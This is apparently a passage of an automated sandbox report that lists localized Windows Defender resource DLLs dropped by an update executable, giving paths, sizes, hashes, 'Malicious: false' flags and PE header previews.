SSDEEP:	384:CLMVHuEVxGq6qjcgqqHWSa/W1fDBRJ9tyLpUad+JR9zusNAm:uM4EZ+c1P9tJadk9zuRm
MD5:	DAFDC5CEF18A55768C751507A98C996D
SHA1:	E1A85048CD666AD9A94467902D492F80C29D671D
SHA-256:	862BFB8804924CAFE46278D94ED67B839DC9B110EAD141D08C104290DDD8479B
SHA-512:	6F65F95AC1AB767CA10A3654E2A03F7027A6B4D9D9B98D1671D256BDD20EEBB72EB10DB4C83EB052567E1CEA545AA60EA295F083583ABDB4C54D59BCFF9C5409
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........V......................................................n.....@.......................................... ..,R...........X...%...........................................................................................rdata..............................@..@.rsrc...,R... ...T..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%..PM...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\sr-Latn-RS\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	66312
Entropy (8bit):	4.358587342444507
Encrypted:	false
SSDEEP:	768:S2zXLgQmnYzHGiOLp1eIR+cLdcJa1PR50Zi9zuiz:9X0QmnYzH8p1eIOaPnzuiz
MD5:	3DD26BFA33549401EE0BCF897A829B46
SHA1:	5377355EB7074AD30770D8EE27D6908226E8DCBA
SHA-256:	6EB3370A392E896E2BD6B4AE16D7138920B81F0C122104949189CB12A850CF85
SHA-512:	601AAB4682BD0D74C8196BB49F58FDD0CB0CDA9AA7CF1DC153D387EEFE078CA7867020041168AAD3608EEC49676C4414F6ED46BFF2BDBA0AEE2263E6743A4BC0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................v.....@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\sr-Latn-RS\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32008
Entropy (8bit):	5.140451141254357
Encrypted:	false
SSDEEP:	384:SVqv1C9IgLEnplhQyFq08pimCqY2Aak/UGYMAJLuWSa/WCDBRJrpQtR9zusBK:A9lLyC/AUGYRnD1PtQP9zuv
MD5:	1D403808AC7E9DB93F105FF089314BA7
SHA1:	2A8F73BA5D557450996715F97F3325068F8B7CD9
SHA-256:	20EF9F3206519651657E1E8BAA4E25667EDF6CC06BB1DD1ABA99DF792D17B6E8
SHA-512:	F814932C7828DCBAF8CF933077C96B670A37286DAF576A35958460423BE76DF2E554F45C711ACFC796FFFDBD6B9200F48C3E27BA5BE4B8E3F306331D1CEEBE0F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........V............................................................@.......................................... ...R...........X...%...........................................................................................rdata..............................@..@.rsrc....R... ...T..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...M...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\sv-SE\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	63752
Entropy (8bit):	4.344268238728333
Encrypted:	false
SSDEEP:	384:l5KGU/svb8FrKgdUnNoBg+b4DDiJv1XwTGUm1TZ86K3Ppnfj9uBZceLp1/xPYb7J:NTbu62JzC202kNt2BSO1PHled9zuzE
MD5:	2C8B29B64CE2E12556827A03100DE67E
SHA1:	6DF29EA5B3AA981B4F5334619896B5EAF919DDC3
SHA-256:	332491926D0B67FD1E44E95B62FA20F987698DC7C7088093C88780E2A576EA17
SHA-512:	5A2246AFFD64E0B2E5CBE95AFA040219ABBE0A793E1506C46F228E49380F2AF7C6485EB39B2260D0710725402C361E9C0CF639EBB95BB1967B04861B3A0ED1A5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................#o....@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\sv-SE\MpEvMsg.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	53520
Entropy (8bit):	4.58605860940054
Encrypted:	false
SSDEEP:	384:sZsVHTjfXBM/6evcf+0fwuWt1wgwZumtjcLg3mb8qIpBJVaKfPx40YnKMWLDDBRh:saVed0YKxD1PjTNx9zB
MD5:	B819DB956202E4BA0507EA114E849BA1
SHA1:	B0E7E78F7E6747E48C4BD3872CFF5415A7E19E28
SHA-256:	BC93470B68E766F0F308F251C34E600BEB2DC2D7B6730F210CA25D6908330DB5
SHA-512:	0212FEFF6C2751B3F483F070EBE80FC0A2CE3DD1BB5AE5842A24204EF25AB7DB18D95F7AA417431813F8C87C0B8A2601962CCF1858AF9E4A5B41F42F9FCC1A72
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................O.....@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.......q........l...P...P..........q........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ....;.F...`..w.8.-.S..1.d.q.....q........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\sv-SE\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30472
Entropy (8bit):	5.166592837010879
Encrypted:	false
SSDEEP:	384:zW+6nC/9NAEMkioM9plSiYvdIw/lbvGwI0QaHaRzNeClKHTnBkV8TEuWSa/WSDB6:a+diYv3bvGFrNpz1PTqadk9zuY
MD5:	BC623991F8868CF988E5A2250059A5EF
SHA1:	7B25329BEE29D350AFC7ADCD76F405C8F3FC958B
SHA-256:	6E16C3143727684C7AFEB770BF13098EA787677D0BBF4E2A14EDEBA78CDF9EDF
SHA-512:	BE46B2469209E536B9E37A2CA142F22B85A8CC9B6CF0B39D0E99F259BE418865DDE2EAEB3373EB62F63D27E0BCAEAF6D4C51C4C35422EE5EB34422AEF5CBC825
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........P...............................................p.......Y....@.......................................... ..HM...........R...%...........................................................................................rdata..............................@..@.rsrc...HM... ...N..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%..PH...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ta-IN\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	34064
Entropy (8bit):	5.539324196010677
Encrypted:	false
SSDEEP:	768:41Ha5u5bVPWjvpLKbsYAYqYBAVs5sBs/Bz2AX+j9yG81PPlx289zS3:9cPPFzS3
MD5:	EE85E5F34CA7FECF40D4D3102782F17C
SHA1:	31FB56EC53235847A5DC5F3DD9FCDF51F4575D6C
SHA-256:	334ECD8BAE3DD111860DDB5D6E0717D91D23E38D5C7B57D19FB42B23F37E042D
SHA-512:	0DED1BE3B6681C48EC48F9C4242CEFE9FF930A1658BE7E458A88DAEF337E7CD8DDEE3D2C554977F58955FF349D7BDD58577E05491BCA83AAA6EFB8B7FC596E94
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........^............................................................@.......................................... ..@Z...........`...%...........................................................................................rdata..............................@..@.rsrc...@Z... ...\..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%..HU...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\te-IN\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31496
Entropy (8bit):	5.569508552771151
Encrypted:	false
SSDEEP:	768:S0oK77fghfAozGJ8A+NK1P650Zi9zuiww:SZKPWzuif
MD5:	6AAD46D26841F1D980DA07FA590DD3F7
SHA1:	1C72D0D96922EBB7D39AB962342166D1EBD6CA9D
SHA-256:	F92612238BD843DD8F00945BF066DE9CDF1692A09A939C7241745AE245B30974
SHA-512:	7B70E588D44A47448A59C2014AACB80005226D904C4E72CE0D7977190CDDD9E60C8CDB43072F085C7FFC205DE1895B42A9C7BCCB2EE6A00509FF0C5BA7D6BA74
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........T......................................................<.....@.......................................... ...Q...........V...%...........................................................................................rdata..............................@..@.rsrc....Q... ...R..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...L...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\th-TH\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	60168
Entropy (8bit):	5.021599234866439
Encrypted:	false
SSDEEP:	768:DtmpTuOhSEpABcrX13Ykkjqyyh7wBOXu1P6RmuU9zu9:RgTjhSEpABcrX13FyyBwBOXWPUd8zu9
MD5:	00BDFB05A20EFB97A7FA77ED962BC4C6
SHA1:	4FEB918A6FA287066E6FA3491B8BCBAEA265B2DB
SHA-256:	CFB075AC130B0992210D7F8D8EA9ED9584EFE789A5723AD5D4F0E9DD9C400908
SHA-512:	FACDBCE82F20FD8DF1577168F53F2D2AFE449A8D27A1D94C7ADDD3BAB55658594E45A2A44AF15AEC92B401E70EF7B977D3904E998520D5DE536512BFD2F63A74
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.................................................................<....@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\th-TH\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28424
Entropy (8bit):	5.745658761016319
Encrypted:	false
SSDEEP:	768:IXofu28WZdjKsXmaTB1PmMufiC9zuu9w0:3KsWaT3PmVzum1
MD5:	FB33223412CBF701EC2A7D4BB1134FBD
SHA1:	9BD6B238923F637A6A218031781E81D09D2EF060
SHA-256:	2172E23B34373EA6766EA675D8160EA30F0E901670822168FB0E481FBFFB8F06
SHA-512:	0E8208AFA974D59C1719F323485B42AE4849EA15D3300A07B165B28AF183DC6DA9E8F957E659BC9E9D1139555FDF9A7797B444777173F05981E60F2099879961
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........H...............................................p.......$....@.......................................... ...E...........J...%...........................................................................................rdata..............................@..@.rsrc....E... ...F..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...A...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\tr-TR\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	64776
Entropy (8bit):	4.490914215844272
Encrypted:	false
SSDEEP:	1536:LpiS0H2w3jUjlRhTNfLXplhbTJ6djMfqirb4ofTf3WsHXBcxii5MVhMIeXpquWJb:d/0H2w3jUjlRhTNfLXplhbTJ6dkfTf39
MD5:	079D5FBB2F4352C13828E78D12519586
SHA1:	479914DA0CBFD404EED6B6A9B9C4BFDB0B3C9764
SHA-256:	D972688C56DDBD241D0D4B9F00D38A99F79C7ED7CA463F9A7D792891A3B4CAB2
SHA-512:	63175F19E742D8BF984204550B1564888388B762D26B490DB7D19D1A2C99F03A15F45BFE65B6C3E4744B9B120F2FA959434981A0CAA364890BE1B819DF30A5B7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................O.....@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\tr-TR\MpEvMsg.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54536
Entropy (8bit):	4.70207043336086
Encrypted:	false
SSDEEP:	768:6nfIuB6GMNfvYOsuMtVynuXqRXcM/YHoKvOzSW0FaG4VCunMd25r+7nhk52VoOJk:wfIuB6BNfUuSW0XuMd2eu8xP2d8zuAFK
MD5:	83F11D0D2DA72B93A86E4B2092B3C967
SHA1:	C6ECC6CC3743D5EBB96BC689D7D6C8C17181FD98
SHA-256:	6E445E9DDCC2820058D1762C336C295D89CBF58699938C5A22F14337750A069F
SHA-512:	1AF4CD4B420806EA8F419955E4EA3CFB570758F2BFD9E86D71376D30C9A54C0912B33D6FB2638E60E4615F3912BBE00D61ED99C8EDF6BB994DD10F560FFFA24C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.................................................................V....@.......................................... ..P................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.......q........l...P...P..........q........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ....;.F...`..w.8.-.S..1.d.q.....q........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\tr-TR\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29960
Entropy (8bit):	5.27513453719463
Encrypted:	false
SSDEEP:	768:x4z4Dbc/+GZIp3NSdLShGK+L7VfWAVn13BtboON6z1PbeRmuU9zuY/:x4z4Dbc/+GZIp3NSdLShGK+L7VfdV13S
MD5:	B6FF9BF3B3AE8DFE441614010580197D
SHA1:	90BB7283AE21384A27EB6EBC1CD540F65994F86E
SHA-256:	676AD9493D7C2F010FE9060877798D12E3EC24B67EEE0027E7FF3E90AFF7B954
SHA-512:	838071066F85D53D401AB46F21E75560F65F1AD30CA51251E9323B25F5ABFB5967704A2800A20B84127A2E29FD7839C62AD0CCD82F0E6B2F88702A63B969C2A0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........N...............................................p......,.....@.......................................... ..$K...........P...%...........................................................................................rdata..............................@..@.rsrc...$K... ...L..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%..@F...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\tt-RU\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30984
Entropy (8bit):	5.599672692725723
Encrypted:	false
SSDEEP:	384:GHyw65NnwwGbWSa/W5DBRJa7leLR9zusk2I/E:Wp+81Pahed9zuz/E
MD5:	E764F8B32FD0A91711A000F32350E5C7
SHA1:	7A8BBF3F6CC8D3E76F08DA40AF5127E9E3696047
SHA-256:	D6ADAD9107F39A672D42E4C007975D17747F1C4BC6D269F4637084F755212318
SHA-512:	7BFCC1F8EE61CD3F38C7364C2937E25DEDE035B2BEF6C9A744300E00A1EAA12AB91E605CC06A3CD1297D680A6DBD193DD4D6F6C156A5E254390DAD6E7C7BF609
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........R...............................................p.......s....@.......................................... ...N...........T...%...........................................................................................rdata..............................@..@.rsrc....N... ...P..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...I...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ug-CN\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30984
Entropy (8bit):	5.576182207611811
Encrypted:	false
SSDEEP:	384:qallWv31mC/yHk1bLEwGPdPsZ/syTnKs6cmM7TLUXeyHWSa/WVDBRJkrsRmuTcRf:ixmKF41PnRmuU9zuk
MD5:	AA7B3835CCC475D166647A3FFA96295B
SHA1:	76436D8D572D4364ECD91DF55F3F6993E3242746
SHA-256:	6B6C35884A3734FEAEAD2CE30E931C4BD2AEAF2DAD48829D78FC4774F71F5BB9
SHA-512:	000C467655EF22F5BB568E015A108DB5AAB53CBBA05EFA3FB2DB255F2128E71B1EF8A74AFDCE888A2571C00983340E32852DD16FC6024E42954D39946E1125DF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........R...............................................p......s.....@.......................................... ..8O...........T...%...........................................................................................rdata..............................@..@.rsrc...8O... ...P..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%..PJ...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\uk-UA\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	67848
Entropy (8bit):	4.82244122889246
Encrypted:	false
SSDEEP:	384:PuTnWcksvPAb/StbLGTyEfQLHM8XSQv2YW2FyUhKEoiI+ddx1KtVQV4minZxWyZZ:eC+2Zbp5Z1PipLg9zukp
MD5:	8616B98808AF8AC9A0A1DEA991301E64
SHA1:	A154BCF86DB7416D7D914EA14053412411C9A811
SHA-256:	0A6F832627BCCCA639759C95E4DF083EA2FF49396F46AA2D1014214BE46B0478
SHA-512:	AC7A7D3F3D442CE7C80FB65C25007FBE38E6668CDB3E4E65F1F70724CA65683F40D0848CB9C1432306D4A91E1750A5204D07097F48ACFD0D2F2E4D26CFB274C3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................0.....@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\uk-UA\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30472
Entropy (8bit):	5.572127183385618
Encrypted:	false
SSDEEP:	384:q/MD3W7jAGy4rsvesv0mowg8WSa/WqDBRJKy50ZSxR9zus2+4G:kMD3WKowaD1PR50Zi9zui4G
MD5:	76007ED5198B42ACEEFCD310D596B32B
SHA1:	E58249D8A03897C8C1DC0181C476520680CBF9CE
SHA-256:	E8D527452BBEAAA04C346D27CF05D24A0EB2BEE03981736602E2DF317734AE1B
SHA-512:	57B62CFA7AE5E4AFEC781B2D7FDC539710C50D5339C4512314E6566C715C9338B2E2D9B2A7E5E682D27D5B4E538ABB5250B5C2B890699BAFDE70209AB9115E75
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........P...............................................p.......D....@.......................................... ...M...........R...%...........................................................................................rdata..............................@..@.rsrc....M... ...N..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...H...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ur-PK\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30984
Entropy (8bit):	5.510317678167108
Encrypted:	false
SSDEEP:	384:RYCzmHGXgLhi2g3Bwh0jcxh70OTJfqtyKksAWSa/WRDBRJDAy50ZSxR9zus2+cUE:CCaHwyKhk1PD350Zi9zuiS
MD5:	02358DB5C6AB0274BA6A24CFD46B3187
SHA1:	3F61830C282EFE8AE354815802BA5B5717E818C7
SHA-256:	74609DE0D6E10F6377248A7699948E8AF2B0BEC7D1AABBFB477AE4775DE4E78B
SHA-512:	BB711F692D5FD813D05653F9AA56B5A98209094896B9E7AC522B86A92477580BE04EA5C3225CF8AE4E4A22EC412659AB0A8D618B891F12E40701BED967796056
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........R...............................................p......$.....@.......................................... ...O...........T...%...........................................................................................rdata..............................@..@.rsrc....O... ...P..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...K...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\vi-VN\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	66312
Entropy (8bit):	4.7830691298257735
Encrypted:	false
SSDEEP:	384:dpq/9Ffa93cGjIwtU+zLJIM+i70f1EvMisEEuk4VQce2EhWnQWBDBRJpypUad+Jy:I3fy3jXDxIMVAWl71PNadk9zu3
MD5:	1E0A7B7B19E525C222FC5AAD04586A81
SHA1:	39297630E4CA913A52B349C6D2C9022A387C36A4
SHA-256:	D275F56137148C2D26D5B8214597F4F9FACED9C2524D089C7B5E54E319AAA978
SHA-512:	85C3B385951DCFAC9B3F1028458B3A05BBADAE450DF95B4395E2B6E0FFC2976E5617166924DE114E64A5106B0DC2DE2D8DA2273012E89097DE951D771F14D8EB
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.....................................................................@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\vi-VN\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30480
Entropy (8bit):	5.530963972249464
Encrypted:	false
SSDEEP:	384:en8PvD+uWSa/WQDBRJCWF//dJR9z36lMb:KN1PCWF//dj9zFb
MD5:	7D2AE4E34A6B8EA5E540F0B4ECB47365
SHA1:	C590C3F423083EA8ED56C0221894D805873BCB3F
SHA-256:	9103443F1F5EC7B09F2EBA29D5A23DD96142650B6774A3851518A37258E73660
SHA-512:	31E9EFF866908FB8890CC7718701D74EC41AD49FFD81083046E5270AE9A98CD1B4B771199A6C3D3D6090378876ED46BB6E7C92B1DED4B374E414A2ADB53C21C9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........P...............................................p.......x....@.......................................... ...L...........R...%...........................................................................................rdata..............................@..@.rsrc....L... ...N..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...G...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\x86\MpAsDesc.dll

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	201992
Entropy (8bit):	5.376335211686565
Encrypted:	false
